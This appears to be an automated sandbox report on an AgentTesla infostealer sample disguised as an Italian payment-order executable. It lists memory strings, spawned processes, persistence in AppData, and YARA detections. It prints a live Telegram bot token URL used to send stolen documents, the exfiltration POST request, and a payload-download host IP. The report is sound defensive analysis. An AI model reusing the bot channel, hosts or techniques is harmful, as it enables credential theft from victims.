Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%
Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/
Source: InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument
Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocumentdocument-----
Source: InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4vl
Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.697823623.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pnLxAwPM33RwXHpPdX.org
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565099550.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564544271.000000000277B000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697494155.000000000256C000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697339824.0000000003069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565099550.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564544271.000000000277B000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697494155.000000000256C000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697339824.0000000003069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565099550.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564544271.000000000277B000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697494155.000000000256C000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697339824.0000000003069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

HTTP traffic detected: POST /bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da26ffe4b41c47Host: api.telegram.orgContent-Length: 1025Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49802 version: TLS 1.2

Source: Vajejvz.exe, 0000000D.00000002.693936859.000000000071B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

.NET source code contains very large array initializations

Source: 11.0.InstallUtil.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.cs	Large array initialization: .cctor: array initializer size 11689
Source: 11.0.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.cs	Large array initialization: .cctor: array initializer size 11689
Source: 11.0.InstallUtil.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.cs	Large array initialization: .cctor: array initializer size 11689
Source: 11.0.InstallUtil.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.cs	Large array initialization: .cctor: array initializer size 11689
Source: 11.2.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.cs	Large array initialization: .cctor: array initializer size 11689

Source: Controllo saldo 30% Ordine 5667.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 14.2.Vajejvz.exe.4009990.1.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.3.Controllo saldo 30% Ordine 5667.exe.3799970.1.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 13.2.Vajejvz.exe.3509990.2.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.3.Controllo saldo 30% Ordine 5667.exe.3819990.2.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 14.2.Vajejvz.exe.4009990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 14.2.Vajejvz.exe.3f89970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 13.2.Vajejvz.exe.3489970.1.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 13.2.Vajejvz.exe.3509990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0.3.Controllo saldo 30% Ordine 5667.exe.3819990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_0251C2D4	0_2_0251C2D4
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_0251E638	0_2_0251E638
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_0251E62B	0_2_0251E62B
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_04C43210	0_2_04C43210
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_04C44348	0_2_04C44348
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_04C4C324	0_2_04C4C324
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_04C4CDCC	0_2_04C4CDCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010DF080	11_2_010DF080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010DF3C8	11_2_010DF3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010D6120	11_2_010D6120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010DF3BD	11_2_010DF3BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_05F80040	11_2_05F80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_05F81FF8	11_2_05F81FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_05F8C8F8	11_2_05F8C8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_05F8BBB8	11_2_05F8BBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_063E0680	11_2_063E0680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_063E1708	11_2_063E1708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_063E0E20	11_2_063E0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_063E4A90	11_2_063E4A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_063E86B0	11_2_063E86B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_063E16A8	11_2_063E16A8
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_0070C2D4	13_2_0070C2D4
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_0070E638	13_2_0070E638
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_0070E629	13_2_0070E629
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_072BC2E0	13_2_072BC2E0
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_072B0040	13_2_072B0040
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_072B4084	13_2_072B4084
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_072B003A	13_2_072B003A
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_074386B9	13_2_074386B9
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_0140C2D4	14_2_0140C2D4
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_0140E629	14_2_0140E629
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_0140E638	14_2_0140E638
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_053473D8	14_2_053473D8
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_07CBC2E0	14_2_07CBC2E0
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_07CB4084	14_2_07CB4084
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_07CB0040	14_2_07CB0040

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: String function: 05F85A60 appears 53 times

Source: Controllo saldo 30% Ordine 5667.exe	Binary or memory string: OriginalFilename vs Controllo saldo 30% Ordine 5667.exe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.556467264.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWbjlanbz.dll" vs Controllo saldo 30% Ordine 5667.exe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKgVTQsKSwkyCvsLYHXVMqlQbtyqFlPhlnjvq.exe4 vs Controllo saldo 30% Ordine 5667.exe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000000.424676531.0000000000222000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebless.exe> vs Controllo saldo 30% Ordine 5667.exe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKgVTQsKSwkyCvsLYHXVMqlQbtyqFlPhlnjvq.exe4 vs Controllo saldo 30% Ordine 5667.exe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564525300.000000000276A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Controllo saldo 30% Ordine 5667.exe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.554735633.0000000003791000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWbjlanbz.dll" vs Controllo saldo 30% Ordine 5667.exe
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565049458.0000000002853000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKgVTQsKSwkyCvsLYHXVMqlQbtyqFlPhlnjvq.exe4 vs Controllo saldo 30% Ordine 5667.exe

Source: Controllo saldo 30% Ordine 5667.exe	Virustotal: Detection: 28%
Source: Controllo saldo 30% Ordine 5667.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

File read: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Jump to behavior

Source: Controllo saldo 30% Ordine 5667.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe "C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe"
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe"
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5	Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

File created: C:\Users\user\AppData\Roaming\Aabvlngef

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/3@2/2

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_01

Source: 11.0.InstallUtil.exe.400000.2.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 11.0.InstallUtil.exe.400000.2.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 11.0.InstallUtil.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 11.0.InstallUtil.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 11.0.InstallUtil.exe.400000.3.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 11.0.InstallUtil.exe.400000.3.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

